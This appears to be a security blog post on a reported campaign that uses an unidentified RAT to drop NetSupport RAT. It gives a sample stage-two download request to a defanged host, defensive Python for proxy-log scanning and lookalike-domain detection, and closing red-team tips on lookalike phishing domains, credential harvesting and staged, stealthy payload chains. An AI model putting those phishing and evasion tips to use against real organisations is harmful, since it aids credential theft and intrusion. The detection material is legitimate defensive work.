In a recent incident documented by SANS Internet Storm Center, a new attack method leverages an unidentified RAT to deploy NetSupport RAT—a powerful remote administration tool. This campaign, which emerged in late 2023, targeted a variety of organizations, indicating a shift towards more complex, multi-stage attack chains. This technique not only showcases the adaptability of threat actors in evading detection but also signifies a heightened level of sophistication in their operational tactics.
The campaign specifically targets industries with significant intellectual property or financial data, including but not limited to technology and finance sectors. Although no single group has claimed responsibility, the use of multiple RATs in a cascading fashion points to an orchestrated effort potentially involving a collaboration of multiple cybercrime outfits. By employing an unidentified RAT initially, threat actors create a veil of anonymity which complicates attribution and incident response efforts.
How It Was Built
The infrastructure for this campaign revolves around a complex, multi-layered delivery system. Threat actors begin by introducing the unidentified RAT through phishing emails, making use of socially engineered content that compels immediate action from the recipient—often masquerading as internal communications or urgent business notifications. An example of such an email might include a subject line: “Confidential: Updated Compliance and Policy Documents”. These emails frequently use spoofed sender identities from domains crafted to closely mirror legitimate organizations, such as hr-update[dot]company[dot]com.
Once the unidentified RAT is successfully deployed onto an endpoint, it acts as a conduit for the subsequent download and execution of the NetSupport RAT. The payload distribution process uses HTTP requests to download malicious scripts from compromised web servers, bypassing traditional email filtering solutions. The following HTTP request illustrates this approach:
GET /docs/update_policy.js HTTP/1.1
Host: compromised-asset[dot]com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
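The request above is issued by the stage-one RAT rather than by a browser, which is visible in its bare User-Agent string. As an added example (not code from the ISC write-up or from this article), the Python below scans constructed proxy-log lines for that shape: script-file downloads from hosts outside an allowlist or from bare IP addresses, carrying a "Mozilla/5.0 (...)" User-Agent that lacks any browser product token. It then links flagged requests from the same client that fall within a short window, which is the multi-stage download pattern described above. The log format, the allowlist, the extension list, the score weights, the sample hosts and the constructed log lines are all assumptions.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit

# Constructed proxy log sample (format: timestamp client method url status "user-agent").
# These lines are illustrative and are not taken from the ISC report.
SAMPLE_LOG = """\
2023-11-14T09:12:01Z 10.1.4.22 GET http://compromised-asset.example/docs/update_policy.js 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2023-11-14T09:12:03Z 10.1.4.22 GET http://cdn.vendor.example/app/bundle.js 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0 Safari/537.36"
2023-11-14T09:15:40Z 10.1.4.31 GET http://intranet.corp.example/policy/compliance.pdf 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0 Safari/537.36"
2023-11-14T09:16:02Z 10.1.4.22 GET http://203.0.113.7/update/stage2.bin 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "(.*)"$')

# Assumption: the only hosts from which script downloads are expected in this environment.
ALLOWED_SCRIPT_HOSTS = {"cdn.vendor.example", "intranet.corp.example"}
# The article shows a .js download; the other extensions generalise to common script droppers.
SCRIPT_EXTS = (".js", ".vbs", ".hta", ".ps1", ".wsf")
# A real browser UA carries engine/product tokens; a bare "Mozilla/5.0 (...)" string
# is typical of HTTP libraries used by downloaders.
BROWSER_TOKENS = ("AppleWebKit", "Gecko/", "Chrome/", "Firefox/", "Safari/", "Edg/")
IP_LITERAL = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, method, url, status, ua = m.groups()
    parts = urlsplit(url)
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "client": client,
            "method": method, "url": url, "host": parts.hostname or "",
            "path": parts.path.lower(), "status": int(status), "ua": ua}


def score_request(req):
    """Additive score; weights are assumptions chosen so that two strong signals flag a request."""
    score, reasons = 0, []
    if req["path"].endswith(SCRIPT_EXTS):
        score += 2; reasons.append("script-download")
    if req["ua"].startswith("Mozilla/") and not any(t in req["ua"] for t in BROWSER_TOKENS):
        score += 2; reasons.append("bare-browser-ua")
    if IP_LITERAL.match(req["host"]):
        score += 2; reasons.append("ip-literal-host")
    if req["host"] not in ALLOWED_SCRIPT_HOSTS:
        score += 1; reasons.append("host-not-allowlisted")
    return score, reasons


def scan_proxy_log(text, threshold=3):
    """Return the requests whose score reaches the threshold, in log order."""
    findings = []
    for line in text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        score, reasons = score_request(req)
        if score >= threshold:
            findings.append({**req, "score": score, "reasons": reasons})
    return findings


def stage_chains(findings, window_s=600):
    """Group flagged requests by client; a client with two or more flagged downloads
    within window_s seconds is reported as a possible multi-stage chain."""
    by_client = {}
    for f in sorted(findings, key=lambda f: f["ts"]):
        by_client.setdefault(f["client"], []).append(f)
    chains = {}
    for client, reqs in by_client.items():
        for i in range(1, len(reqs)):
            if (reqs[i]["ts"] - reqs[i - 1]["ts"]).total_seconds() <= window_s:
                chains[client] = [r["url"] for r in reqs]
                break
    return chains


if __name__ == "__main__":
    hits = scan_proxy_log(SAMPLE_LOG)
    for h in hits:
        print(h["ts"].isoformat(), h["client"], h["url"], h["score"], ",".join(h["reasons"]))
    for client, urls in stage_chains(hits).items():
        print("possible staged download chain from", client, "->", urls)
```

Scoring rather than a single rule keeps the vendor CDN's bundle.js (a script download, but a full browser UA from an allowlisted host) below the threshold, while the two downloads from 10.1.4.22 are each flagged and then tied together as a chain. In practice the same logic is far stronger when joined with endpoint telemetry showing which process made the request, since the page's point is that the first RAT, not a browser, fetches the second stage.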
Why It Worked
This attack’s success is largely attributed to its multilayered nature. Firstly, the initial use of an unidentified RAT rather than directly deploying NetSupport RAT adds a layer of obfuscation, making detection significantly more difficult for defenders who may not expect a dual-RAT setup. By the time the final payload (NetSupport RAT) is delivered, it’s done in a trusted communication channel established by the first RAT.
Secondly, employing legitimate-looking domain names enhances email credibility, increasing click-through and execution rates. Tools like Let’s Encrypt are utilized to issue TLS certificates for these domains, adding another layer of perceived authenticity and trustworthiness, which significantly lowers defensive scrutiny.
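Lookalike sender domains appear twice above: as the phishing delivery vehicle in "How It Was Built" and as the credibility lever in this paragraph. As an added defensive example, not code from the article or from ISC, the Python below classifies the sender domain of an inbound message against the organization's own domains. Subdomains of the real registrable domain are treated as the organization's own; confusable-character substitutions, near matches by edit distance, the brand embedded in a different registrable domain, and the brand used as a subdomain label of a foreign domain are all reported as lookalikes. The legitimate domain list, the confusables table and the naive two-label registrable-domain rule are assumptions (real tooling would consult the Public Suffix List and a fuller confusables table).

```python
# Assumption: the organization's legitimate registrable domains (constructed for this example).
LEGIT_DOMAINS = ["acme-corp.example"]

# Assumption: a small illustrative confusables table applied before comparing labels.
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalize_label(label):
    """Lower-case a DNS label and collapse common visual substitutions."""
    label = label.lower()
    for bad, good in CONFUSABLES:
        label = label.replace(bad, good)
    return label


def levenshtein(a, b):
    """Standard edit distance (insert, delete, substitute), single-row DP."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(domain):
    """Split into (registrable domain, subdomain labels) using the last two labels.
    Assumption: no multi-label public suffixes such as co.uk; use the Public Suffix List in practice."""
    labels = domain.lower().strip(".").split(".")
    return ".".join(labels[-2:]), labels[:-2]


def classify_sender_domain(sender, legit_domains=LEGIT_DOMAINS, max_distance=1):
    """Return (verdict, reason) where verdict is 'own', 'lookalike' or 'unrelated'."""
    reg, sub_labels = registrable(sender)
    sld = reg.split(".")[0]
    norm_sld = normalize_label(sld)
    for legit in legit_domains:
        legit_reg, _ = registrable(legit)
        brand = normalize_label(legit_reg.split(".")[0])
        if reg == legit_reg:
            return "own", f"registrable domain {reg} is {legit}"
        if norm_sld == brand and sld != brand:
            return "lookalike", f"{sld!r} normalizes to brand {brand!r} (confusable characters)"
        if levenshtein(norm_sld, brand) <= max_distance:
            return "lookalike", f"{sld!r} is within edit distance {max_distance} of {brand!r}"
        if brand in norm_sld:
            return "lookalike", f"brand {brand!r} embedded in foreign registrable domain {reg}"
        if any(brand in normalize_label(lbl) for lbl in sub_labels):
            return "lookalike", f"brand {brand!r} used as a subdomain label of foreign domain {reg}"
    return "unrelated", "no resemblance to a known domain"


# Constructed sender domains covering each branch of the classifier.
SAMPLE_SENDERS = [
    "acme-corp.example",            # own
    "hr-update.acme-corp.example",  # own (subdomain of the real registrable domain)
    "acrne-corp.example",           # confusable: rn -> m
    "acmecorp.example",             # hyphen dropped, edit distance 1
    "acme-corp-hr.example",         # brand embedded in a different registrable domain
    "acme-corp.hr-update.example",  # brand as a subdomain of a foreign domain
    "vendor.example",               # unrelated
]


def triage_senders(senders=SAMPLE_SENDERS):
    """Classify each sender domain; returns {domain: verdict}."""
    return {s: classify_sender_domain(s)[0] for s in senders}


if __name__ == "__main__":
    for s in SAMPLE_SENDERS:
        verdict, reason = classify_sender_domain(s)
        print(f"{s:32} {verdict:10} {reason}")
```

A certificate from a public CA proves control of the name and nothing about who registered it, so a valid certificate on a lookalike domain should be expected rather than treated as reassuring. A classifier of this kind belongs at the mail gateway alongside SPF, DKIM and DMARC enforcement, and running it over newly issued names from certificate transparency logs gives early warning of a lookalike before the first message arrives.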
The non-linear installation process, in which the initial RAT acts as a quiet intermediary rather than performing overtly malicious actions itself, keeps disruption to a minimum and sidesteps behavioral analysis tools that look for exactly such actions. The covert protocol used for communication between the two RATs further hardens the delivery chain against detection.
Operator Takeaways
Red teamers can glean several insights from this campaign to bolster their own operations. Incorporate multi-stage infection chains that progressively escalate privileges or capabilities. This tactic not only mimics advanced threat actors but also effectively tests an organization’s lateral movement detection capabilities.
Moreover, leveraging lookalike domains in phishing operations can drastically increase user engagement. Experiment with different certificate authorities to issue TLS certificates, ensuring encrypted traffic not only bypasses basic traffic filtering but also enhances the perceived legitimacy of your communication channels.
Good / Better / Best
Good: Implement phishing simulations that utilize lookalike domains to measure click-through rates and harvest credentials effectively.
Better: Design multi-tiered payload deployment strategies that incorporate progressive trust-building mechanisms, such as initial benign payloads that later transition to full remote administration capabilities.
Best: Execute end-to-end attack chains using legitimate communication channels (including HTTPS) to remain undetected throughout the entire engagement process, thus thoroughly assessing an organization’s deep packet inspection capabilities and internal threat intelligence response mechanisms.
References
- SANS Internet Storm Center: New Deployment of NetSupport RAT
Related Reading
- What is a RAT in the Context of Phishing?
- Implementing Command and Control Mechanisms in Phishing Campaigns
- What is Privilege Escalation in the Context of Phishing?
- Advanced Command and Control Evasion Techniques
Educational Purpose: This content is provided for awareness and defensive purposes only. Understanding attacker methodologies helps individuals and organizations protect themselves.